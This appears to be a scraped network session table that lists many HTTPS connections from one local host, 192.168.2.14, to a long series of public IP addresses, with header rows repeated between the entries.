                                                        10633192.168.2.143696454.37.246.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10634192.168.2.144135451.16.113.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10635192.168.2.1453628223.135.163.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10636192.168.2.1446474223.239.189.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10637192.168.2.1434288159.185.43.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10638192.168.2.1456934126.128.152.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10639192.168.2.1452436185.203.172.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10640192.168.2.1454430206.55.88.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10641192.168.2.1458782202.162.160.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10642192.168.2.144176884.176.157.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10643192.168.2.1448768192.167.145.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10644192.168.2.1449130148.194.59.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10645192.168.2.1456416169.127.115.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10646192.168.2.143506872.164.137.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10647192.168.2.1453174167.156.179.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10648192.168.2.1437850149.141.200.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10649192.168.2.1460992114.166.114.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10650192.168.2.143681487.106.12.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10651192.168.2.1450624202.29.54.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10652192.168.2.1437606209.72.80.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10653192.168.2.1460824162.28.204.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10654192.168.2.1438670186.42.205.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10655192.168.2.1434298216.193.84.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10656192.168.2.14549505.48.64.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10657192.168.2.1445306133.177.233.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10658192.168.2.144952092.55.251.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10659192.168.2.1434360102.224.118.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10660192.168.2.145109637.29.245.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10661192.168.2.1446292205.219.64.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10662192.168.2.143311065.71.52.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10663192.168.2.143751243.88.108.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10664192.168.2.143803092.133.253.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10665192.168.2.1436858199.160.220.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10666192.168.2.145187048.177.97.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10667192.168.2.1452214159.171.223.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10668192.168.2.1448386169.56.110.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10669192.168.2.1451950210.88.98.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10670192.168.2.1434900128.154.47.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10671192.168.2.1436490137.206.27.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10672192.168.2.143351032.179.171.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10673192.168.2.1456172173.11.89.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10674192.168.2.145953457.21.65.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10675192.168.2.146062281.126.100.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10676192.168.2.1441352165.25.43.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10677192.168.2.1435768210.134.141.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10678192.168.2.143692069.185.213.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10679192.168.2.1449242201.20.140.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10680192.168.2.1459694133.217.176.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10681192.168.2.1445574221.64.76.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10682192.168.2.1442028139.88.153.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10683192.168.2.1440150192.241.18.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10684192.168.2.143358495.6.185.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10685192.168.2.1459638150.247.13.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10686192.168.2.1458782116.151.247.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10687192.168.2.143352281.75.11.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10688192.168.2.1458704212.172.28.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10689192.168.2.1459102123.177.75.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10690192.168.2.1458268101.89.228.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10691192.168.2.1436418155.105.23.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10692192.168.2.1459750115.242.239.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10693192.168.2.143685649.124.97.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10694192.168.2.1433888114.218.89.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10695192.168.2.144190883.2.11.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10696192.168.2.143677212.149.145.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10697192.168.2.144618090.12.69.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10698192.168.2.145732458.47.235.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10699192.168.2.1460416167.130.227.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10700192.168.2.145360886.205.19.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10701192.168.2.144474474.244.221.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10702192.168.2.144449060.130.220.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10703192.168.2.1442250190.39.40.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10704192.168.2.1441082133.118.175.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10705192.168.2.1435444207.157.203.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10706192.168.2.145362047.207.51.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10707192.168.2.143422693.40.24.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10708192.168.2.1454434124.17.225.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10709192.168.2.1443374117.222.110.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10710192.168.2.1445764156.8.145.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10711192.168.2.144870054.208.49.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10712192.168.2.14365609.149.94.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10713192.168.2.1448684201.159.37.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10714192.168.2.1453964147.247.129.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10715192.168.2.145242677.32.64.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10716192.168.2.1435964143.224.242.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10717192.168.2.144808666.231.204.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10718192.168.2.1443060104.91.67.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10719192.168.2.145633042.249.244.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10720192.168.2.144836224.52.216.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10721192.168.2.1433924105.25.229.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10722192.168.2.1456296152.253.144.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10723192.168.2.1436444151.230.106.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10724192.168.2.1433838101.165.142.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10725192.168.2.1450286176.38.40.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10726192.168.2.1454098132.103.187.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10727192.168.2.1437788144.210.80.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10728192.168.2.1452422121.255.223.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10729192.168.2.145313051.6.171.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10730192.168.2.145033684.19.254.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10731192.168.2.1455448151.138.230.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10732192.168.2.1452480188.99.245.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10733192.168.2.1460818182.66.227.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10734192.168.2.1457806201.65.175.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10735192.168.2.1457540105.177.126.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10736192.168.2.14580465.195.40.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10737192.168.2.1460592131.29.217.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10738192.168.2.143955050.84.137.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10739192.168.2.1437620171.142.87.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10740192.168.2.145998485.145.218.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10741192.168.2.14371705.1.173.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10742192.168.2.144265492.89.42.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10743192.168.2.14522882.61.207.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10744192.168.2.143414412.201.57.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10745192.168.2.14517885.172.1.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10746192.168.2.145988646.129.10.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10747192.168.2.1447406100.44.209.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10748192.168.2.1448166103.224.22.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10749192.168.2.1447500148.81.179.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10750192.168.2.1449294186.55.107.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10751192.168.2.145512874.231.84.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10752192.168.2.1454628117.224.147.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10753192.168.2.1446406144.102.29.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10754192.168.2.144892247.245.162.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10755192.168.2.1440078200.237.64.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10756192.168.2.144236254.253.171.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10757192.168.2.1439062116.83.223.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10758192.168.2.145226213.30.195.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10759192.168.2.144005086.160.94.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10760192.168.2.146018236.155.66.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10761192.168.2.1460718143.158.162.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10762192.168.2.1433100152.170.115.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10763192.168.2.146059667.229.113.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10764192.168.2.1433530177.112.235.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10765192.168.2.1441904100.155.172.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10766192.168.2.143910699.84.219.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10767192.168.2.1443978132.134.105.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10768192.168.2.1439820115.3.152.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10769192.168.2.1441096146.246.226.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10770192.168.2.144100259.27.45.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10771192.168.2.145920290.177.67.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10772192.168.2.144684887.130.174.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10773192.168.2.1456336125.70.214.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10774192.168.2.145815892.215.5.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10775192.168.2.1460550160.69.218.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10776192.168.2.1440364206.190.88.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10777192.168.2.1457008163.190.174.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10778192.168.2.1445138204.198.66.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10779192.168.2.1460914102.211.141.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10780192.168.2.1448500198.56.228.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10781192.168.2.1444368148.225.91.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10782192.168.2.1434558174.156.246.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10783192.168.2.146035836.138.46.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10784192.168.2.1435470109.6.28.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10785192.168.2.1452762179.26.74.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10786192.168.2.1457052161.166.90.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10787192.168.2.1453160218.6.20.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10788192.168.2.145800431.50.202.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10789192.168.2.144618280.218.70.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10790192.168.2.1444328110.190.43.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10791192.168.2.1454260204.254.1.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10792192.168.2.1434600133.188.186.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10793192.168.2.144872423.55.183.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10794192.168.2.145337842.128.170.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10795192.168.2.1458696222.155.71.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10796192.168.2.144823445.76.82.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10797192.168.2.145208678.120.241.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10798192.168.2.145188071.54.80.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10799192.168.2.145703097.222.52.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10800192.168.2.144113266.61.234.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10801192.168.2.1443318181.191.36.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10802192.168.2.1449188109.38.125.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10803192.168.2.1447714166.169.203.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10804192.168.2.145989878.221.99.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10805192.168.2.1434560182.86.128.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10806192.168.2.1450602121.222.184.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10807192.168.2.1444964144.88.20.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10808192.168.2.1435852129.100.60.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10809192.168.2.1449912209.92.236.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10810192.168.2.1455222155.106.87.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10811192.168.2.1438190140.1.19.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10812192.168.2.143940890.196.9.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10813192.168.2.1450930150.66.40.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10814192.168.2.1445036174.130.156.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10815192.168.2.143286236.59.84.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10816192.168.2.1460844105.254.17.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10817192.168.2.144046843.215.3.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10818192.168.2.1446828101.220.194.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10819192.168.2.144116866.68.181.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10820192.168.2.1455656205.46.236.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10821192.168.2.1451724207.238.65.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10822192.168.2.145125825.244.60.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10823192.168.2.1459198218.152.218.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10824192.168.2.1447844173.104.23.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10825192.168.2.1453948200.122.250.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10826192.168.2.143888823.105.218.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10827192.168.2.1445846201.75.43.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10828192.168.2.1433814181.130.231.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10829192.168.2.1454078109.0.246.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10830192.168.2.143910258.158.112.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10831192.168.2.143287680.124.76.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10832192.168.2.1444880189.129.250.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10833192.168.2.143380673.236.252.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10834192.168.2.1448642222.93.8.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10835192.168.2.144773444.149.35.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10836192.168.2.145446052.239.189.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10837192.168.2.1446796191.209.168.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10838192.168.2.145431412.191.54.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10839192.168.2.1454114202.167.46.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10840192.168.2.1435440159.167.57.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10841192.168.2.144654869.127.52.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10842192.168.2.1447648167.117.28.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10843192.168.2.1437992149.128.184.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10844192.168.2.143796880.254.180.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10845192.168.2.1452132124.225.160.188443
